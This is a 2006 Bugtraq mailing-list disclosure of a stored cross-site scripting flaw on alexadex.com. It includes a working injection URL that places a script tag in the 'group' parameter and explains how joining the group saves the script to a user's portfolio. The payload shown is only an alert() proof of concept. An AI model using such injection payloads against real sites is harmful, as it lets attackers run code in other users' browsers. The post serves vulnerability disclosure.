Bugtraq mailing list archives
Alexadex.com players.py XSS Exploit
From: skinnypuppy () hushmail ai
Date: 5 May 2006 08:10:04 -0000
+++++++++++++++++++++++++++++++++++++ |Alexadex.com players.py XSS Exploit| +++++++++++++++++++++++++++++++++++++ May 04,2006 ++++++++++++++++++++++++++++++++ |XSS Exploition on alexadex.com| ++++++++++++++++++++++++++++++++ http://www.alexadex.com/ad/players?group=<script>alert("SKINNYPUPPY");</script> What this will do is add a group with the name: <script>alert("SKINNYPUPPY");</script> When you click the "Join this group" it sets the injected code to your Portfolio and when viewed it executes the injected code. ++++++++++++++++++++++++++++++++ EMAIL: skinnypuppy () hush ai demo: http://www.alexadex.com/ad/user/xss
Current thread:
- Alexadex.com players.py XSS Exploit skinnypuppy (May 06)